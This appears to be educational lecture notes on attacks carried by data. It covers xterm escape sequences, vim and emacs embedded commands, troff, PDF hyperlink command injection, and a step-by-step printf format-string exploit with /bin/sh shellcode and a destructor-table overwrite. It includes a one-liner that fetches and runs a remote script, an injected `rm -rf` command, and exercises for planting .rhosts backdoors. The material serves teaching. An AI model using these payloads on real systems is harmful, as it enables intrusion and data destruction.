One is inclined to think about data processing as having programs, the active parts, and data, the passive parts. Then it comes as a surprise that one can be attacked by data.
The first time I created active data was in 1974 on a PDP-8 under OS/8. The command GET should read a binary tape or file, but not execute it. The command RUN would execute it. However, a suitably crafted papertape would take over control of the machine when read using the GET command. This was done taking advantage of an off-by-one error in the loader.
Text sent to a terminal is displayed there. Most terminals recognize command sequences embedded in the text. Common sequences indicate bold, or blinking, or underline, or half bright. More recently also color. Other sequences ask for erase line, scroll up etc. etc. On the VT100 such special sequences mostly start with the ESC symbol, and hence they are known as "escape sequences".
But the traffic is bidirectional - one can ask a terminal for its model number or serial number, for a status, for the position of the cursor, for the contents of the current line, for the screen contents.
That is interesting. Send someone a letter with some embedded sequences. If she views it on her terminal, the sequences may activate terminal functions. Text sent back by the terminal itself is indistinguishable from commands typed by the user.
For example, on vt100 terminals the character 0232 or the combination ESC Z
sends back the terminal ID, 1;2c
on my xterm
.
Programs like xterm
often have powerful features.
Old versions of xterm
accept escape sequences that specify
a log file, and ask to start logging to that file. But that means
that anybody who manages to get his text printed on such a terminal
can destroy a file of his choice - maybe even give it a chosen content.
Current versions have this feature switched off by default.
But so many features remain.
People usually set mesg n
to inhibit writes to their terminal.
Programs like write
and talk
must filter out
escape sequences.
There used to be all kinds of fun with terminals. For example,
stty speed 0 < /dev/ttyN
would set the baud rate of
a given terminal to zero and log the user off.
Even when there is no security breach, funny sequences can cause
a loss of time. One can iconify the window, change its size,
lock (part of) it, change character set, make foreground and
background colors equal, and do lots of other annoying things,
so that it may take a non-expert a considerable amount of time
to get back to normal.
There may also be privacy concerns. On an xterm
,
the 3-symbol sequence ESC [ i
sends the screen to the printer.
Exercise
Play with xterm
.
What do the sequences ESC [ 2 t
and ESC [ 3 ; 100 ; 0 t
and ESC [ 4 ; 1 ; 1 t
and ESC [ 2 1 t
and ESC ] 2 ; h a c k e d
BEL do?
(Test by typing to cat
or ed
or so, or use echo
,
for example echo -e "\e]2;hacked\a"
.)
As a combination of the last two parts of this exercise, look at
echo -e "\e]2;;wget 127.0.0.1/.bd;sh .bd;exit;\a\e[21t\e]2;xterm\aPress Enter>\e[8m;"The command to fetch a file with commands from some place on the net and execute it is stored in the window title bar. Then the window title bar is reported, and executed as soon as the user hits enter.
Exercise
(
H D Moore)
What does echo -e "\eP0;0|0A/17\x9c"
do?
Exercise
Construct a filename so that echoing its name to an xterm
window colours the background red.
Exercise
Construct a filename so that echoing its name to an xterm
window removes the line containing that name. A good name to use
if one knows that the name of a program will be echoed in an error message
to the console screen.
Exercise
Design a short text file called README so that after the command
cat README
the xterm
window does not show
anything suspicious, but after the next command the machine is hacked
(let us say, a file .rhosts
is created that allows access
to anyone).
The Unix editor ex
(with "visual" variant vi
)
would accept the sequences ex:
, ei:
, vx:
and vi:
occurring in the first or last five lines of the
file being edited, and interpret the rest of the line as a
startup command. (Still in 4.2 BSD.) Later this behaviour was made
conditional upon a variable modeline
or modelines
.
This is still the situation on many systems that have some vi
-clone.
One could do funny things, like setting the shell and tags programs to be used, so that the system would be compromised as soon as a shell escape was used. On other systems it was even easier, and commands could be invoked directly from the modeline via a shell escape. ( Here a discussion from 2001.)
Recent systems either disable modelines, or enable them but disallow the most dangerous uses. Nevertheless similar bugs keep coming up - allowing embedded scripts in files is inherently unsafe.
Georgi Guninski gave the example (Dec 2002)
/* vim:set foldmethod=expr: */ /* vim:set foldexpr=confirm(libcall("/lib/libc.so.6","system","/bin/ls"),"ms_sux"): */ vim better than windozethat later was upgraded to a worm. On my system the version
vim: foldmethod=expr vim: foldexpr=libcall("/lib/libc.so.6","system","/bin/ls\ -l") vim better than windozeworks better (and shows how to use commands with parameters).
Exercise Find whether this works in your vi, possibly
after changing the settings for modeline
or
modelines
.
Construct a letter such that if the vi-using receiver replies to it
a backdoor is left on his system.
In Dec 2004 the following was discovered:
% cat .vimrc set modeline filetype plugin on % cat evil.vim let a = system('echo "I was here" > /tmp/owned') % cat test onzin vim: ft=../../../../../home/aeb/evil % cat /tmp/owned cat: /tmp/owned: No such file or directory % vim test % cat /tmp/owned I was here
Clearly, any cautious user has set nomodeline
in his .vimrc
.
Note that in many contexts people have tried to restrict the use
of files to "local" ones, forbidding absolute pathnames.
Often such a restriction can be circumvented using ../
.
In a completely similar way, many files contain embedded strings
intended to set emacs
options. For example, many man page
source files start out
.\" Hey Emacs! This file is -*- nroff -*- source.Here the part between
-*-
's defines the major mode, and can
also contain variable settings. There can also be a Local Variables:
part at the end of a file. For example, in the Linux kernel many files in
the SCSI code part end with
/* * Overrides for Emacs so that we follow Linus's tabbing style. * Emacs will notice this stuff at the end of the file and automatically * adjust the settings for this buffer only. This must remain at the end * of the file. * --------------------------------------------------------------------------- * Local variables: * c-indent-level: 4 * c-brace-imaginary-offset: 0 * c-brace-offset: -4 * c-argdecl-indent: 4 * c-label-offset: -4 * c-continued-statement-offset: 4 * c-continued-brace-offset: 0 * indent-tabs-mode: nil * tab-width: 8 * End: */This feature can (and should!) be disabled, but
enable-local-variables
is often t
by default.
Set it to nil
. Sometimes one has to use
inhibit-local-variables
. Set it to t
.
Sometimes there is an additional variable enable-local-eval
that enables the more dangerous actions in a Local variables section.
Charles Howes gave the example
So there you are, reading along in some file that you found. Just browsing away, when what happens, but some magic bit of Local variables: find-file-hooks: ((lambda () (unwind-protect (save-excursion (goto-char 0) (re-search-forward "^Local variables:$") (beginning-of-line) (let ((p (point))) (re-search-forward "^End:$") (let ((m (buffer-modified-p))) (delete-region p (1+ (point))) (setq p (point)) (insert "-- hi there, I'm toast. -- ") (insert (or (buffer-file-name) "nil")) (call-process-region p (point) "/bin/echo" t 0 nil "you" "are" "toast") (set-buffer-modified-p m) ))) (kill-local-variable 'find-file-hooks)))) End: text buried in that buffer comes to life and runs an arbitrary piece of code at you. Have a nice day!
(This works here. The known attacks in this style were fixed in emacs 21.3.)
Exercise Find whether this works in your emacs,
possibly after changing the settings for enable-local-eval
,
enable-local-variables
, inhibit-local-variables
.
Very similar things hold for the Microsoft world, where macro viruses have been seen since 1995. An MS Word or Excel document can have a macro section with Word.Basic commands. Arbitrary actions can be caused by just opening the document. Some ancient links: an early advisory, an early FAQ, Virus Encyclopedia, Macro Virus writing Tutorial Part 1, Part 2.
Formatters use a formatting language. Sometimes this language allows one to invoke arbitrary commands.
Runoff was a text formatter. Unix had the typesetter version troff
and the non-typesetter version nroff
. GNU has groff
.
These days TeX has taken over (mostly because troff
is
proprietary I suppose - for myself I prefer troff
),
but troff
is still widely used as man page formatter.
Various versions have commands that will invoke arbitrary system programs
(e.g. .sy cmd
or .pso cmd
).
Thus, it may be dangerous to view man pages obtained from an
unreliable source.
On my current Linux system I see
% cat foo.1 .sy date .pso ls % man ./foo.1 <standard input>:2: .sy request not allowed in safer mode <standard input>:3: .pso request not allowed in safer mode % troff -U foo.1 Tue Apr 1 11:00:05 CEST 2003 x T ps x res 72000 1 1 x init ...That is, one has to ask for "unsafer" mode for these macros to take effect.
A similar story. Postscript "pictures" are really programs. In case such programs can execute arbitrary system commands, it is dangerous to look at Postscript files from untrusted sources. If your browser can display Postscript, then you lose as soon as you click on a link to a page that contains an evil picture.
And even if the viewer tries to restrict dangerous commands, it can be hit by a buffer overflow or syntax error. There is a long list of advisories concerning the handling of PostScript and PDF, the latest one today.
One can also insert bad strings into a PDF file, that cause a
viewer like xpdf
to emit an error message containing
that bad string. If the viewer was invoked on an xterm
then tricks discussed above apply: one can hit xterm with
arbitrary escape sequences.
PDF files can also contain suitably constructed hyperlinks that can cause arbitrary code to be run when activated by the reader.
Let us look at some detail. First, what precisely does xpdf
(my PDF viewer) do when one clicks a hyperlink? Maybe it calls a
browser - the details depend on user settings. Some config file,
like /etc/xpdfrc
or .xpdfrc
, can contain a line like
urlCommand "netscape -remote 'openURL(%s)'"telling what to do with this hyperlink. If there is no such line we get a message
URI: ...
on the xterm where we invoked
xpdf
.
Exercise Construct a PDF file with a hyperlink such that
clicking that link (when urlCommand
is not set) will
set the xterm title bar to "-hacked-" and move the xterm window to some
other place on the screen.
But things are more interesting when there is a urlCommand
.
It will be invoked as system(CMD &)
, that is, as
sh -c 'CMD &'
.
(More precisely, single and double quotes in CMD will be replaced by
%27 and %22, otherwise CMD is copied faithfully. The latest RedHat
security fix also replaces back quotes by %60.)
A urlCommand
like the default one shown above (with the %s part
enclosed in single quotes) is fairly safe. But many distributions have an
unprotected %s. For example, RedHat 8.0 uses
urlCommand "/usr/bin/xpdf-handle-url %s"
Make a LaTeX file with a hyperlink:
\documentclass[11pt]{minimal} \usepackage{color} \usepackage[urlcolor=blue,colorlinks=true,pdfpagemode=none]{hyperref} \begin{document} \href{prot:hyperlink with stuff, say, `rm -rf /tmp/abc`; touch /tmp/pqr}{\texttt{Click me}} \end{document}and invoke
pdflatex
to make a PDF file. Now look at it
with xpdf
, and click the link. The file /tmp/abc
is removed and /tmp/pqr
is created. (If there is a popup window
telling that /usr/bin/xpdf-handle-url
should be edited
to teach it about the protocol prot:
, hit enter in that window.)
One can follow what happens using
strace -f -e execve xpdf test.pdf
or so.
The sh -c '/usr/bin/xpdf-handle-url prot:hyperlink with stuff,
say, `rm -rf /tmp/abc`; touch /tmp/pqr'
invokes rm
via the backquote construction, and touch
since ;
is a command separator.
We see that a security fix that removes backquotes does not suffice. The right fix is to write
urlCommand "/usr/bin/xpdf-handle-url '%s'"and to have a
xpdf-handle-url
that never exposes its $1
like the RedHat 8.0 version does in another sh -c
.
Conclusion of this discussion: one can easily produce PDF files
such that when these are viewed by xpdf
on a current machine
arbitrary commands are executed (with the permissions of the reader).
I have not tried Acroread, but one says that the same things hold there.
Exercise Construct a PDF file with a hyperlink such that
clicking that link on a RedHat 8.0 system will create a .rhosts
file with appropriate contents in the reader's home directory.
More a method than an example comes with the routine printf()
.
The ordinary use is for formatted printing, as in
printf("val=%d\n",val)
or printf("Hello, world!\n")
.
The argument string is printed, except that some combinations
involving %
have a special meaning.
The example printf("Hello, world!\n")
inspires people to write
printf(s)
where s
is some string. But that has
interesting effects when the user can influence the string that
is printed, making sure that it contains active data.
Let us write the program echo.c
.
#include <stdio.h> int main(int argc, char **argv) { int i; for (i = 1; i < argc; i++) { if (i > 1) printf(" "); printf(argv[i]); } printf("\n"); return 0; }
Seems straightforward, and it works. Or, does it?
% ./echo Goodbye SCO! Goodbye SCO! % ./echo Ach %d %s Ach -1073744428 h÷ÿ¿o÷ÿ¿s÷ÿ¿v÷ÿ¿ % ./echo "%08x %08x %08x %08x %08x" bffff5d4 bffff588 4015afd8 40018420 00000001 % ./echo "%s %s %s %s %s" Segmentation fault
If the string contains a percent-something combination then
the required argument is fetched from the stack, and we print garbage
or crash. We understand the crash: the address 00000001
is
used to print a string from, but there is nothing there.
Let us try to understand the garbage.
When printf()
prints the string, the stack has the
local variables of printf()
, the saved frame pointer,
the return address, and the parameters of printf()
-
in this case the format string. Try to get at the format string by using
a longer format string. Typing lots of %08x
gets boring.
Use perl
to do that for us.
(For perl
, .
is concatenation, and x
repeats the preceding string the indicated number of times. For example,
"%08x %08x %08x %08x "
can be written as "%08x "x4
.)
% FMT=`perl -e 'print ((("%08x "x8)."\n")x6)'`; ./echo "$FMT" bffff4f4 bffff4a8 4015afd8 40018420 00000001 bffff4c8 40040d17 00000002 bffff4f4 bffff500 40018ba0 00000002 08048280 00000000 080482a1 0804833c 00000002 bffff4f4 080483b0 08048410 4000d930 bffff4ec 00000000 00000002 bffff67c bffff683 00000000 bffff779 bffff792 bffff7e7 bffff7f7 bffff829 bffff838 bffff85f bffff86a bffff875 bffff885 bffff896 bffff8a4 bffff8c0 bffff8d2 bffff8e5 bffff900 bffff909 bffffbca bffffbe3 bffffc03 bffffc11 %The stack grows downward from
0xc0000000
and hence pointers
to the stack tend to look like 0xbfff....
. All those pointers
to the stack at the end of the above list are environment pointers:
% FMT=`perl -e 'print (((("%08x "x8)."\n")x3).("%08x "x3)."%s\n"x2)'`; ./echo "$FMT" bffff554 bffff508 4015afd8 40018420 00000001 bffff528 40040d17 00000002 bffff554 bffff560 40018ba0 00000002 08048280 00000000 080482a1 0804833c 00000002 bffff554 080483b0 08048410 4000d930 bffff54c 00000000 00000002 bffff6e2 bffff6e9 00000000 LESSKEY=/etc/lesskey.bin MANPATH=/usr/local/man:/usr/share/man:/usr/X11R6/man:... %Below the environment pointers we see
argc
(2) and the list of
(the two) arguments of the ./echo "$FMT"
invocation, terminated by
NULL.
% FMT=`perl -e 'print (((("%08x "x8)."\n")x3)."%s\n"x2)'`; ./echo "$FMT" bffff564 bffff518 4015afd8 40018420 00000001 bffff538 40040d17 00000002 bffff564 bffff570 40018ba0 00000002 08048280 00000000 080482a1 0804833c 00000002 bffff564 080483b0 08048410 4000d930 bffff55c 00000000 00000002 ./echo %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %s %s %Yes, precisely as expected. We can find the format string on the stack, with the closing NUL byte at address
0xbffff778
and a starting
address that depends on its length.
(Above the starting address was bffff6e9
with a string of length
143.)
The program itself lives around 08048000
:
% nm ./echo | grep -w main 0804833c T mainso numbers like
08048280
, 080482a1
, 0804833c
,
080483b0
, 08048410
are probably program addresses.
Can such a printf format flaw be exploited?
Read the printf(3)
manual page. We encounter %n
:
Interesting. One can write to a given address. The value written to that address is the number of bytes printed so far. We have easy control over that. Can put lots of padding in the format string, or, easier, use formats liken The number of characters written so far is stored into the integer indicated by the int * pointer argument.
%73x
to print numbers
with any predetermined amount of padding.
So, any (not too large) number above some lower bound can be written
via %n
. Remains to get control over the address written to.
First read a bit more in printf(3)
. It says
(There is more text there, and we'll violate the rules, but it works.)By default, the arguments are used in the order given, where each `*' and each conversion specifier asks for the next argument. One can also specify explicitly which argument is taken, by writing `%m$' instead of `%' and `*m$' instead of `*', where the decimal integer m denotes the position in the argument list.
That simplifies matters. We can use this in the format to jump immediately to the desired place. As a test, let us find program name and format again on the stack.
% ./echo '%25$s %26$s' ./echo %25$s %26$sAs expected. Now overwrite the program name with an exclamation mark.
% ./echo '%25$33s%25$n %25$s' ./echo !Look what happened. First we print the program name padded with spaces, in a field of width 33. Then write the number of symbols written so far (that is, 33, the ASCII code for
!
) to the place where the
program name was found earlier. Four bytes are written, in little-endian
order, 0x33, 0, 0, 0, and the first two of these form the string "!"
that is printed now.
So it works. We can overwrite memory with a given value. But the address written to was found only because there happened to be a pointer to it on the stack. In order to write to arbitrary addresses we must have arbitrary pointers on the stack, and can create them since the format string is found on the stack.
Where is this format string? Dump a larger fraction of the stack.
% FMT=`perl -e 'print ((("%08x "x8)."\n")x16)'`; ./echo "$FMT" bffff354 bffff308 4015afd8 40018420 00000001 bffff328 40040d17 00000002 bffff354 bffff360 40018ba0 00000002 08048280 00000000 080482a1 0804833c 00000002 bffff354 080483b0 08048410 4000d930 bffff34c 00000000 00000002 bffff4e2 bffff4e9 00000000 bffff779 bffff792 bffff7e7 bffff7f7 bffff829 bffff838 bffff85f bffff86a bffff875 bffff885 bffff896 bffff8a4 bffff8c0 bffff8d2 bffff8e5 bffff900 bffff909 bffffbca bffffbe3 bffffc03 bffffc11 bffffc1c bffffc2a bffffc3e bffffc51 bffffcff bffffd08 bffffd2a bffffd3f bffffd53 bffffd6f bffffd7a bffffde8 bffffdf0 bffffdff bffffe1d bffffe2a bffffe49 bffffe5c bffffe81 bffffea2 bffffead bffffec6 bffffed2 bffffede bfffff07 bfffff1f bfffff45 bfffff78 bfffff85 bfffffa2 bfffffb7 bfffffcf bfffffdb bfffffec 00000000 00000020 ffffe400 00000021 ffffe000 00000010 0183f9ff 00000006 00001000 00000011 00000064 00000003 08048034 00000004 00000020 00000005 00000006 00000007 40000000 00000008 00000000 00000009 08048280 0000000b 000001f4 0000000c 000001f4 0000000d 00000064 0000000e 00000064 00000017 00000000 0000000f bffff4dd 00000000 00000000 00000000 00000000 00000000 38366900 2f2e0036 6f686365 38302500 30252078 25207838 %Yes. The format repeats the bytes
%08x
, that is, 0x25, 0x30,
0x38, 0x78, 0x20, starting from 0xbffff4e9
, closing NUL at
0xbffff778
. Here argument 126 is 0x38302500
, that is,
the closing NUL of the program name, and the first three bytes of the format.
And argument 127 is 0x30252078
, the next four bytes of the format.
Life is simpler when the format string starts at an address divisible
by 4, so in this example we must give it a length that is 0 (mod 4).
(Note that the sh
backquote construction trims trailing newlines,
so that the format in this last example has length 655.)
For example,
% ./echo 'AAAABB %124$08x %125$08x' AAAABB 41414141 25204242Here the string has length 24, divisible by 4, and 124 words from top-of-stack the
AAAA
is seen. This number 124 varies a little with the length
of the format string (mod 16) due to alignment effects. Let us only work
with formats of a length divisible by 16, then the format starts at
word 126:
./echo 'ABCDXXX %126$08x' ABCDXXX 44434241
Try to overwrite the program name with "Hoi!". That is, we want bytes
0x48, 0x6f, 0x69, 0x21, 0 (decimal 72, 111, 105, 33, 0)
at some address like 0xbffff4e2
.
Using %n
we can write four bytes, but the value written is the
number of bytes output so far, and 0x21696f48 is too large, so it must
be written one byte at a time. Do four writes, to increasing addresses.
Each write creates the byte we want but overwrites the next three bytes
with NULs.
If we make a format string of length 64, then it will start at
0xbffff738
, and the program name will start at
0xbffff731
.
% FMT=`perl -e 'print "\x31\xf7\xff\xbf\x32\xf7\xff\xbf\x33\xf7\xff\xbf\x34\xf7\xff\xbf%56d%126\x24n%39d%127\x24n%250d%128\x24n%184d%129\x24n\x0a%25\x24s"'` % ./echo "$FMT" 1÷ÿ¿2÷ÿ¿3÷ÿ¿4÷ÿ¿ -1073744476 -1073744552 1075163096 1073841184 Hoi! %Explanation: the part
\x31\xf7\xff\xbf
stores 4 bytes that
together form the address 0xbffff731
.
Then \x32\xf7\xff\xbf
forms 0xbffff732
. Etc.
Four addresses start the format string, ready to be accessed via
%126$n
, %127$n
, etc. Here the dollar sign is coded
as \x24
to prevent expansion as shell variable.
In order to write the desired values via these %n
pointers,
we have to print some bytes. That is the purpose of the %56d
etc. parts of the format. Finally, the %25$s
prints the
program name, verifying that we succeeded in writing "Hoi!" there.
The \x0a
is a newline, making sure that "Hoi!" appears on
a new line after the garbage line.
This means that we have complete control over the program. We can make it exec a shell and get remote access if this was a remote program, or get root access if this was a setuid root program.
Very small field widths will fail: printing 666 with format %2d
takes 3 positions, not 2. The worst case with a decimal signed format
may be -2147483648 which takes 11 positions. So, one should use
%258d
instead of %2d
(etc.) so as to avoid
this problem. Or one can use %2c
instead, where that
is supported.
For an exploit it suffices to overwrite a single memory location with a single value. The memory location will be one that holds a return address, or the address of a function that is going to be called. The single value will be the address of a function that we would like to call instead.
A concrete setup can be the following:
1. Put shellcode in the environment:
% SHELLCODE=`perl -e 'print "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"'` % export SHELLCODE(This modifies the environment, and changes all addresses found above, so should have been done at the start.)
1a. Find the address of the shellcode. Maybe with a tiny program like
#include <stdio.h> #include <stdlib.h> int main(int ac, char **av) { while (--ac > 0) { char *p = getenv(*++av); printf("%p\n", p); } return 0; }Give this tiny program a name of the same length as that of the program we want to exploit (increasing the length of the program name by 1 decreases the address of environment variables by 2), and ask for the address:
% ./addr SHELLCODE 0xbffff837
2. Find the address of the destructor table of the program.
% nm ./echo | grep DTOR 08049580 d __DTOR_END__ 0804957c d __DTOR_LIST__
Now write the address of the shellcode, that is, 0xbffff837
to the address 0x08049580
.
When the program exits, its destructors will be called and
our shellcode is executed.
Some security-conscious programs remove all environment variables except perhaps for a few known ones. If one cannot store a string in the environment, the string can be one of the program parameters. If the program does not allow that, one can create a link to the program so that the exploit string becomes the name of the program.
Maybe the first exploit of this type was the wu-ftpd exploit (published June 2000, one of the exploits given there is dated 15-10-1999). Study the code!
When people started looking for such vulnerabilities, these were found
all over the place.
An xlock
exploit.
An rpc.statd
exploit.
An LPRng
exploit.
These were root exploits. Here a
PHP exploit
that gives one the rights of the invoker, probably httpd.
Many variations on this theme are discussed on the web. A good reference to these exploits is this 2001 writeup. See also the notes by Frédéric Raynal and Kalou.